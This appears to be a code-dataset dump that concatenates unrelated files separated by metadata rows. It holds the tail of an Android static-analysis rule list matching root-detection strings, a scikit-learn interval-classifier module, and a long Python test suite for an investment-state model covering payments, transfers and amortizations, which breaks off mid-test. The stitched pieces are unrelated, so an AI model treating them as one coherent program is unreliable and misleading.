'match': 'string_or',
'input_case': 'exact',
'cvss': 0,
'cwe': 'CWE-250'
},
{
'desc': 'This App may have root detection capabilities.',
'type': 'string',
'string1': '.contains("test-keys")',
'string2': '/system/app/Superuser.apk',
'string3': 'isDeviceRooted()',
'string4': '/system/bin/failsafe/su',
'string5': '/system/sd/xbin/su',
'string6': '"/system/xbin/which", "su"',
"string7": 'RootTools.isAccessGiven()',
'level': 'good',
'match': 'string_or',
'input_case': 'exact',
'cvss': 0,
'cwe': ''
}]
| gpl-3.0 | 4,659,156,025,997,647,000 | 33.277064 | 246 | 0.512379 | false |
vene/ambra | ambra/classifiers.py | 1 | 6082 | import numpy as np
from sklearn.base import BaseEstimator
from sklearn.linear_model import LogisticRegression, Ridge
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.validation import check_random_state
from pairwise import pairwise_transform, flip_pairs
def _nearest_sorted(scores, to_find, k=10):
position = np.searchsorted(scores, to_find)
width = k / 2
offset = k % 2
if position < width:
return slice(None, k)
elif position > len(scores) - width - offset:
return slice(-k, None)
else:
return slice(position - width, position + width + offset)
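# Worked example: _nearest_sorted(np.arange(10), 3.5, k=4) returns slice(2, 6),
# i.e. the four sorted scores (2, 3, 4, 5) closest to 3.5.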
def _interval_dist(a, b):
a_lo, a_hi = a
b_lo, b_hi = b
if b_lo >= a_lo and b_hi <= a_hi: # b contained in a
return 0.0
else:
return np.abs(0.5 * (b_lo + b_hi - a_lo - a_hi))
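# Worked example (illustrative): _interval_dist((2000, 2010), (2003, 2005)) == 0.0
# because b is contained in a, while _interval_dist((2000, 2010), (2015, 2019))
# == abs(0.5 * (2015 + 2019 - 2000 - 2010)) == 12.0, i.e. the distance between
# the two interval midpoints (2005 and 2017).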
class DummyIntervalClassifier(BaseEstimator):
"""Dummy predictor that chooses one of the possible intervals.
Possible target intervals have to be passed along with each training
instance. Can be used as a simple baseline for sanity-checking.
Parameters
----------
method: {"center" (default)|"random"},
If "center", always predicts the middle interval from the list given.
If "random", an interval is uniformly picked.
random_state: None (default) int or np.random object,
Seed for the random number generator. Only used if `method="random"`.
"""
def __init__(self, method="center", random_state=None):
self.method = method
self.random_state = random_state
def fit(self, X, Y):
pass
def _predict_interval(self, possible_intervals, rng=None):
if self.method == "center":
            return possible_intervals[len(possible_intervals) // 2]
elif self.method == "random":
if rng is None:
rng = check_random_state(self.random_state)
return possible_intervals[rng.randint(len(possible_intervals))]
def predict(self, X, Y_possible):
if self.method == "random":
rng = check_random_state(self.random_state)
else:
rng = None
return [self._predict_interval(possible_intervals, rng)
for possible_intervals in Y_possible]
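# Minimal usage sketch (data assumed for illustration): the baseline ignores X and
# only chooses among the candidate intervals supplied at prediction time.
#
#   clf = DummyIntervalClassifier(method="center")
#   clf.fit(X=None, Y=None)  # fit is a no-op for this baseline
#   clf.predict([None], [[(1800, 1850), (1850, 1900), (1900, 1950)]])
#   # -> [(1850, 1900)]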
class IntervalRidge(Ridge):
def predict(self, X, Y_possible):
predicted_years = super(IntervalRidge, self).predict(X)
predicted_intervals = np.array([self.get_interval(possible_intervals, predicted_year)
for possible_intervals, predicted_year in zip(Y_possible, predicted_years)])
return predicted_intervals
def fit(self, X, Y):
Y_regression = np.array([np.mean(y) for y in Y])
return super(IntervalRidge, self).fit(X, Y_regression)
def get_interval(self, intervals, year):
year = int(year)
# if the year is not included in any of the intervals,
# it is situated either to the left or to the right of the possible intervals
if year < intervals[0][0]:
return intervals[0]
elif year > intervals[-1][1]:
return intervals[-1]
else:
# TODO: can be implemented with np.searchsorted
for interval in intervals:
if interval[0] <= year <= interval[1]:
return interval
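# Note: IntervalRidge reduces each target interval to its midpoint, fits a plain
# ridge regression on those midpoints, and at prediction time snaps the predicted
# year back onto one of the candidate intervals via get_interval, clamping to the
# first or last candidate when the prediction falls outside all of them.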
class IntervalLogisticRegression(LogisticRegression):
def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0,
random_state=None, solver='liblinear', max_iter=100,
multi_class='ovr', verbose=0, n_neighbors=5, limit_pairs=1.0):
self.penalty = penalty
self.dual = dual
self.tol = tol
self.C = C
self.fit_intercept = False
self.intercept_scaling = 1
self.class_weight = None
self.random_state = random_state
self.solver = solver
self.max_iter = max_iter
self.multi_class = multi_class
self.verbose = verbose
self.n_neighbors = n_neighbors
self.limit_pairs = limit_pairs
self.loss = 'lr' # required for sklearn 0.15.2
def fit(self, X, y):
rng = check_random_state(self.random_state)
X_pw = pairwise_transform(X, y, limit=self.limit_pairs,
random_state=rng)
X_pw, y_pw = flip_pairs(X_pw, random_state=rng)
self.n_pairs_ = len(y_pw)
super(IntervalLogisticRegression, self).fit(X_pw, y_pw)
train_scores = safe_sparse_dot(X, self.coef_.ravel())
order = np.argsort(train_scores)
self.train_intervals_ = y[order]
self.train_scores_ = train_scores[order]
return self
def score(self, X, y):
print("pairwise accuracy is used")
X_pw = pairwise_transform(X, y)
X_pw, y_pw = flip_pairs(X_pw, random_state=0) # not fair
return super(IntervalLogisticRegression, self).score(X_pw, y_pw)
def _predict_interval(self, score, possible_intervals):
interval_scores = [sum(_interval_dist(cand, nearest)
for nearest
in self.train_intervals_[
_nearest_sorted(self.train_scores_,
score, k=self.n_neighbors)])
for cand in possible_intervals]
return possible_intervals[np.argmin(interval_scores)]
def predict(self, X, Y_possible):
pred_scores = safe_sparse_dot(X, self.coef_.ravel())
return [self._predict_interval(score, possible_intervals)
for score, possible_intervals
in zip(pred_scores, Y_possible)]
if __name__ == '__main__':
X = np.arange(10)[:, np.newaxis]
Y = [[4, 7], [1, 3], [2, 4], [8, 15], [5, 6], [1, 2], [10, 11],
[10, 12], [10, 13], [10, 14]]
from sklearn.cross_validation import KFold, cross_val_score
from sklearn.utils import shuffle
X, Y = shuffle(X, Y, random_state=0)
    print(cross_val_score(IntervalLogisticRegression(C=1.0),
                          X, Y, cv=KFold(len(X), n_folds=3)))
| bsd-2-clause | 3,683,267,477,776,859,000 | 37.0125 | 93 | 0.598652 | false |
Som-Energia/somenergia-generationkwh | generationkwh/investmentstate_test.py | 1 | 48119 | # -*- coding: utf-8 -*-
from .investmentstate import (
InvestmentState,
InvestmentStateError as StateError,
forceUnicode,
GenerationkwhState,
AportacionsState
)
import unittest
from yamlns import namespace as ns
from .isodates import isodate
from .testutils import assertNsEqual
class InvestmentState_Test(unittest.TestCase):
user = "MyUser"
timestamp = "2000-01-01 00:00:00.123435"
logprefix = "[{} {}] ".format(timestamp, user)
assertNsEqual = assertNsEqual
def assertExceptionMessage(self, e, text):
self.assertEqual(forceUnicode(e.args[0]), text)
def setUp(self):
self.maxDiff = None
def setupInvestment(self, **kwds):
if kwds and 'log' not in kwds:
kwds.update(log = "previous log\n")
if kwds and 'actions_log' not in kwds:
kwds.update(actions_log = "actions: []")
return GenerationkwhState(self.user, self.timestamp, **kwds)
def assertChangesEqual(self, inv, attr,
expectedlog=None, noPreviousLog=False):
changes=ns(inv.changed())
log = changes.pop('log','')
actions = changes.pop('actions_log','actions: []')
self.assertNsEqual(changes, attr)
if expectedlog is None: return
self.assertMultiLineEqual(log,
self.logprefix + expectedlog +
("" if noPreviousLog else u"previous log\n")
)
def assertLogEquals(self, log, expected):
for x in log.splitlines():
self.assertRegexpMatches(x,
u'\\[\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}.\\d+ [^]]+\\] .*',
u"Linia de log con formato no estandard"
)
logContent = ''.join(
x.split('] ')[1]+'\n'
for x in log.splitlines()
if u'] ' in x
)
self.assertMultiLineEqual(logContent, expected)
def assertActionsEqual(self, inv, expected):
actions = ns.loads(inv.changed().get('actions_log','actions: []'))
lastAction = actions.actions[-1] if actions and actions.actions else {}
self.assertNsEqual(lastAction, expected)
# Infrastructure tests
def test_changes_by_default_noChange(self):
inv = self.setupInvestment()
self.assertNsEqual(inv.changed(), """\
{}
""")
def test_init_withBadParams(self):
with self.assertRaises(StateError) as ctx:
self.setupInvestment(
badParameter = 'value',
)
self.assertExceptionMessage(ctx.exception,
"Investments have no 'badParameter' attribute")
def test_getattr(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
self.assertEqual(inv.nominal_amount, 100)
def test_getattr_badattr(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
with self.assertRaises(AttributeError) as ctx:
inv.badattrib
self.assertExceptionMessage(ctx.exception,
"badattrib")
def test_setattr_fails(self):
inv = self.setupInvestment(
nominal_amount = 100,
)
with self.assertRaises(AttributeError) as ctx:
inv.nominal_amount = 5
self.assertExceptionMessage(ctx.exception,
"nominal_amount")
def test_values_takesInitialValues(self):
inv = self.setupInvestment(
name = "GKWH00069",
log = 'my log',
)
self.assertNsEqual(inv.values(), """
name: GKWH00069
log: my log
actions_log: 'actions: []'
""")
def test_values_avoidsAliasing(self):
inv = self.setupInvestment(
name = "GKWH00069",
log = 'my log',
)
values = inv.values()
values.newAttribute = 'value'
self.assertNsEqual(inv.values(), """
name: GKWH00069
log: my log
actions_log: 'actions: []'
""")
def test_values_mergesChanges(self):
inv = self.setupInvestment(
name = "GKWH00069",
nominal_amount = 200.,
purchase_date = False,
log = 'my log',
draft=True,
)
inv.correct(
from_amount= 200.0,
to_amount = 300.0,
)
values = inv.values()
values.pop('actions_log')
self.assertNsEqual(values, """
name: GKWH00069
nominal_amount: 300.0
paid_amount: 0.0
purchase_date: False
draft: True
log: '[2000-01-01 00:00:00.123435 MyUser] CORRECTED: Quantitat canviada abans del
pagament de 200.0 € a 300.0 €
my log'
""")
def test_erpChanges(self):
inv = self.setupInvestment(log='previous value\n')
inv.pact(
date = isodate('2016-05-01'),
comment = "lo dice el jefe",
name = 'GKWH00069',
order_date = isodate('2000-01-01'),
purchase_date = isodate('2000-01-02'),
first_effective_date = isodate('2000-01-03'),
last_effective_date = isodate('2000-01-04'),
active = False,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: 2000-01-02
first_effective_date: 2000-01-03
last_effective_date: 2000-01-04
active: False
""")
self.assertMultiLineEqual(log,
self.logprefix +
u"PACT: Pacte amb l'inversor. "
"active: False, first_effective_date: 2000-01-03, last_effective_date: 2000-01-04, name: GKWH00069, order_date: 2000-01-01, purchase_date: 2000-01-02 "
"Motiu: lo dice el jefe\n"
u"previous value\n")
def test_erpChanges_changingAmounts(self):
inv = self.setupInvestment(
nominal_amount = 100,
purchase_date=False,
draft=True,
)
inv.correct(
from_amount = 100,
to_amount = 200,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
nominal_amount: 200
nshares: 2
""")
def test_erpChanges_clearsPaidAmount(self):
inv = self.setupInvestment(
nominal_amount = 100,
paid_amount = 0,
draft = False,
)
inv.pay(
date = isodate('2016-05-01'),
amount = 100,
move_line_id = 666,
)
changes=inv.erpChanges()
log = changes.pop('log')
actions = changes.pop('actions_log')
self.assertNsEqual(changes, """\
            #paid_amount: 100 # Expect this one to be removed
purchase_date: 2016-05-01
first_effective_date: 2017-05-01
last_effective_date: 2041-05-01
""")
def test_addAction_firstAction(self):
inv = InvestmentState(self.user, self.timestamp)
actions = inv.addAction(
param = 'value'
)
self.assertNsEqual(actions, """
actions:
- timestamp: '{0.timestamp}'
user: {0.user}
param: value
""".format(self))
def test_addAction_secondAction(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = """
actions:
- timestamp: 'asdafs'
user: Fulanito
param1: value1
""",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- timestamp: 'asdafs'
user: Fulanito
param1: value1
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_unparseable(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = " : badcontent",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: " : badcontent"
type: unparseable
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_notADict(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "badcontent",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "badcontent"
type: badcontent
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_badRootKey(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "badroot: lala",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "badroot: lala"
type: badroot
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
def test_addAction_notInnerList(self):
inv = InvestmentState(self.user, self.timestamp,
actions_log = "actions: notalist",
)
actions = inv.addAction( param2 = 'value2')
self.assertNsEqual(actions, """
actions:
- content: "actions: notalist"
type: badcontent
- timestamp: '{0.timestamp}'
user: {0.user}
param2: value2
""".format(self))
# Helper and getter tests
def test_fistEffectiveDate(self):
self.assertEqual(isodate('2017-04-28'),
InvestmentState.firstEffectiveDate(isodate('2016-04-28')))
def test_fistEffectiveDate_pioners(self):
self.assertEqual(isodate('2017-03-28'),
InvestmentState.firstEffectiveDate(isodate('2016-04-27')))
@unittest.skip("First investment didn't take into account bisixtile year")
def test_fistEffectiveDate_bisextile(self):
self.assertEqual(isodate('2021-01-28'),
InvestmentState.firstEffectiveDate(isodate('2020-01-28')))
def test_hasEffectivePeriod_whenUnstarted(self):
result = InvestmentState.hasEffectivePeriod(
first_date = None,
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, False)
def test_hasEffectivePeriod_whenUnfinished(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = None,
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenSameDay(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenOrdered(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-01'),
last_date = isodate('2018-02-01'),
)
self.assertEqual(result, True)
def test_hasEffectivePeriod_whenCrossed(self):
result = InvestmentState.hasEffectivePeriod(
first_date = isodate('2018-01-02'),
last_date = isodate('2018-01-01'),
)
self.assertEqual(result, False)
def pendingAmortizations(self, purchase_date, current_date, investment_amount, amortized_amount):
inv = self.setupInvestment(
purchase_date=purchase_date and isodate(purchase_date),
nominal_amount=investment_amount,
amortized_amount=amortized_amount,
)
return inv.pendingAmortizations(isodate(current_date))
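    # The fixtures below encode the amortization schedule implied by the
    # implementation: instalments start two years after the purchase date and
    # recur yearly; each is 4% of the nominal amount (40 out of 1000) over
    # 24 instalments, with the last instalment doubled (80) so the total reaches 100%.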
def test_pendingAmortizations_unpaid(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date=False,
current_date='2002-01-01',
investment_amount=1000,
amortized_amount=0,
), [
])
def test_pendingAmortizations_justFirstAmortization(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2002-01-01',
investment_amount=1000,
amortized_amount=0,
), [
(1, 24, '2002-01-01', 40),
])
def test_pendingAmortizations_justBeforeFirstOne(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2001-12-31',
investment_amount=1000,
amortized_amount=0,
), [])
def test_pendingAmortizations_justSecondOne(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2003-01-01',
investment_amount=1000,
amortized_amount=0,
), [
(1, 24, '2002-01-01', 40),
(2, 24, '2003-01-01', 40),
])
def test_pendingAmortizations_alreadyAmortized(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2003-01-01',
investment_amount=1000,
amortized_amount=40,
), [
(2, 24, '2003-01-01', 40),
])
def test_pendingAmortizations_lastDouble(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2025-01-01',
investment_amount=1000,
amortized_amount=920,
), [
(24, 24, '2025-01-01', 80),
])
def test_pendingAmortizations_allDone(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2050-01-01',
investment_amount=1000,
amortized_amount=1000,
), [
])
def test_pendingAmortizations_allPending(self):
self.assertEqual(
self.pendingAmortizations(
purchase_date='2000-01-01',
current_date='2040-01-01',
investment_amount=1000,
amortized_amount=0,
), [
( 1, 24, '2002-01-01', 40),
( 2, 24, '2003-01-01', 40),
( 3, 24, '2004-01-01', 40),
( 4, 24, '2005-01-01', 40),
( 5, 24, '2006-01-01', 40),
( 6, 24, '2007-01-01', 40),
( 7, 24, '2008-01-01', 40),
( 8, 24, '2009-01-01', 40),
( 9, 24, '2010-01-01', 40),
(10, 24, '2011-01-01', 40),
(11, 24, '2012-01-01', 40),
(12, 24, '2013-01-01', 40),
(13, 24, '2014-01-01', 40),
(14, 24, '2015-01-01', 40),
(15, 24, '2016-01-01', 40),
(16, 24, '2017-01-01', 40),
(17, 24, '2018-01-01', 40),
(18, 24, '2019-01-01', 40),
(19, 24, '2020-01-01', 40),
(20, 24, '2021-01-01', 40),
(21, 24, '2022-01-01', 40),
(22, 24, '2023-01-01', 40),
(23, 24, '2024-01-01', 40),
(24, 24, '2025-01-01', 80),
])
# Public actions tests
def test_order(self):
inv = self.setupInvestment()
inv.order(
name = 'GKWH00069',
date = isodate('2000-01-01'),
ip = '8.8.8.8',
amount = 300.0,
iban = 'ES7712341234161234567890',
)
changes=inv.changed()
log = changes.pop('log')
self.assertChangesEqual(inv, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: null
first_effective_date: null
last_effective_date: null
active: True
nominal_amount: 300.0
amortized_amount: 0.0
paid_amount: 0.0
draft: True
""")
self.assertMultiLineEqual(log,
self.logprefix + u"ORDER: "
u"Formulari omplert des de la IP 8.8.8.8, "
u"Quantitat: 300 €, IBAN: ES7712341234161234567890\n")
self.assertActionsEqual(inv, u"""
type: order
user: {user}
timestamp: '{timestamp}'
amount: 300.0
ip: 8.8.8.8
iban: ES7712341234161234567890
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_order_withNoIban(self):
inv = self.setupInvestment()
inv.order(
name = 'GKWH00069',
date = isodate('2000-01-01'),
ip = '8.8.8.8',
amount = 300.0,
iban = '', # This changes
)
changes=inv.changed()
log = changes.pop('log','')
self.assertChangesEqual(inv, """\
name: GKWH00069
order_date: 2000-01-01
purchase_date: null
first_effective_date: null
last_effective_date: null
active: True
nominal_amount: 300.0
amortized_amount: 0.0
paid_amount: 0.0
draft: True
""")
self.assertMultiLineEqual(log,
self.logprefix + u"ORDER: "
u"Formulari omplert des de la IP 8.8.8.8, "
u"Quantitat: 300 €, IBAN: None\n")
self.assertActionsEqual(inv, u"""
type: order
user: {user}
timestamp: '{timestamp}'
amount: 300.0
ip: 8.8.8.8
iban: null
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_invoice(self):
inv = self.setupInvestment(
draft = True,
)
inv.invoice()
self.assertChangesEqual(inv, """\
draft: false
""",
u"INVOICED: Facturada i remesada\n"
)
self.assertActionsEqual(inv, u"""
type: invoice
user: {user}
timestamp: '{timestamp}'
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_invoice_notDraft(self):
inv = self.setupInvestment(
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.invoice()
self.assertExceptionMessage(ctx.exception,
"Already invoiced")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log Error
)
def test_pay(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
purchase_date: 2016-05-01
first_effective_date: 2017-05-01
last_effective_date: 2041-05-01
paid_amount: 300.0
""",
u"PAID: Pagament de 300 € efectuat "
u"[666]\n"
)
self.assertActionsEqual(inv, u"""
type: pay
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_pay_alreadyPaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Already paid")
self.assertChangesEqual(inv, """\
paid_amount: 600.0
""",
# TODO: Log the error!
u"PAID: Pagament de 300 € efectuat "
u"[666]\n"
)
def test_pay_wrongAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 400.0, # Wrong!
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Wrong payment, expected 300.0, given 400.0")
self.assertChangesEqual(inv, """\
paid_amount: 400.0
""",
# TODO: Log the error!
u"PAID: Pagament de 400 € efectuat "
u"[666]\n"
)
def test_pay_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True, # Wrong!!
)
with self.assertRaises(StateError) as ctx:
inv.pay(
date = isodate('2016-05-01'),
amount = 300.0, # Wrong!
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Not invoiced yet")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertChangesEqual(inv, """\
purchase_date: null
first_effective_date: null
last_effective_date: null
paid_amount: 0.0
""",
u"UNPAID: Devolució del pagament de 300.0 € [666]\n"
)
self.assertActionsEqual(inv, u"""
type: unpay
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_unpay_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"No pending amount to unpay")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay_wrongAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = '2000-01-01',
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 200.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Unpaying wrong amount, was 200.0 expected 300.0")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
def test_unpay_draft(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = False,
draft = True,
)
with self.assertRaises(StateError) as ctx:
inv.unpay(
amount = 300.0,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
"Not invoiced yet")
self.assertChangesEqual(inv, """\
{}
"""
# TODO: Log the error!
)
# TODO: unpay effective
def test_divest_effective(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 0.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2000-01-01"),
last_effective_date = isodate("2024-01-01"),
draft = False,
)
inv.divest(
date = isodate("2001-08-01"),
move_line_id = 666,
amount = 300.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2001-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 300.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2001-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_beforeEffectiveDate(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
purchase_date = isodate("2001-01-01"),
amortized_amount = 0.0,
first_effective_date = isodate("2001-01-01"),
last_effective_date = isodate("2025-01-01"),
draft = False,
)
inv.divest(
date = isodate("2000-08-01"),
move_line_id = 666,
amount = 300.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2000-08-01
active: False
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 300.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2000-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_amortized(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 12.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2000-01-01"),
last_effective_date = isodate("2024-01-01"),
draft = False,
)
inv.divest(
date = isodate("2001-08-01"),
move_line_id = 666,
amount = 288.,
)
self.assertChangesEqual(inv, """\
last_effective_date: 2001-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTED: Desinversió total, tornats 288.0 € [666]\n'
)
self.assertActionsEqual(inv, u"""
type: divest
user: {user}
timestamp: '{timestamp}'
amount: 288.0
move_line_id: 666
date: 2001-08-01
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_divest_amortizedRequiresUnamortizedAmount(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 12.0,
purchase_date = isodate("2000-01-01"),
first_effective_date = isodate("2001-01-01"),
last_effective_date = isodate("2025-01-01"),
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.divest(
date = isodate("2000-08-01"),
amount = 300.,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
u"Divesting wrong amount, tried 300.0 €, unamortized 288.0 €")
def test_divest_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
amortized_amount = 0.0,
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.divest(
date = isodate("2000-08-01"),
amount = 300.,
move_line_id = 666,
)
self.assertExceptionMessage(ctx.exception,
u"Paid amount after divestment should be 0 but was -300.0 €")
def test_emitTransfer(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
draft = False,
)
inv.emitTransfer(
date = isodate("2006-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertChangesEqual(inv, """
last_effective_date: 2006-08-01
active: True
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTEDBYTRANSFER: Traspas cap a '
u'Palotes, Perico amb codi GKWH00069 [666]\n'
)
self.assertActionsEqual(inv, u"""
type: transferout
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2006-08-01
toinvestment: GKWH00069
topartner: Palotes, Perico
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_emitTransfer_beforeEffectiveDate(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
draft = False,
)
inv.emitTransfer(
date = isodate("2000-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertChangesEqual(inv, """
last_effective_date: 2000-08-01
active: False
paid_amount: 0.0
amortized_amount: 300.0
""",
u'DIVESTEDBYTRANSFER: Traspas cap a '
u'Palotes, Perico amb codi GKWH00069 [666]\n'
)
self.assertActionsEqual(inv, u"""
type: transferout
user: {user}
timestamp: '{timestamp}'
amount: 300.0
move_line_id: 666
date: 2000-08-01
toinvestment: GKWH00069
topartner: Palotes, Perico
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_emitTransfer_unpaid(self):
inv = self.setupInvestment(
nominal_amount = 300.0,
order_date = isodate("2000-01-01"),
purchase_date = False,
first_effective_date = False,
last_effective_date = False,
draft = False,
)
with self.assertRaises(StateError) as ctx:
inv.emitTransfer(
date = isodate("2000-08-01"),
move_line_id = 666,
to_name = "GKWH00069",
to_partner_name = "Palotes, Perico",
amount = 300.0,
)
self.assertExceptionMessage(ctx.exception,
"Only paid investments can be transferred")
self.assertChangesEqual(inv, """
{}
"""
# TODO: Log the error!
)
def test_receiveTransfer(self):
inv = self.setupInvestment()
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
amortized_amount = 0.0,
draft = False,
)
inv.receiveTransfer(
name = 'GKWH00666',
date = isodate("2001-01-02"),
move_line_id = 666,
amount = 300.0,
origin=origin,
origin_partner_name = "Palotes, Perico",
)
self.assertChangesEqual(inv, """
name: GKWH00666
order_date: 2000-01-01 # Same as origin
purchase_date: 2000-01-02 # Same as origin
first_effective_date: 2001-01-03 # Next day of the transaction date
last_effective_date: 2025-01-02 # Same as origin
active: True
paid_amount: 300.0
nominal_amount: 300.0
amortized_amount: 0.0
draft: false
""",
u'CREATEDBYTRANSFER: Creada per traspàs de '
u'GKWH00069 a nom de Palotes, Perico [666]\n',
noPreviousLog=True,
)
self.assertActionsEqual(inv, u"""
type: transferin
user: {user}
timestamp: '{timestamp}'
date: 2001-01-02
frominvestment: GKWH00069
frompartner: Palotes, Perico
move_line_id: 666
""".format(
user = self.user,
timestamp = self.timestamp,
))
def test_receiveTransfer_beforeEffectiveDate(self):
origin = self.setupInvestment(
name = "GKWH00069",
order_date = isodate("2000-01-01"),
purchase_date = isodate("2000-01-02"),
first_effective_date = isodate("2001-01-02"),
last_effective_date = isodate("2025-01-02"),
amortized_amount = 0.0,
draft = False,
)
inv = self.setupInvestment()
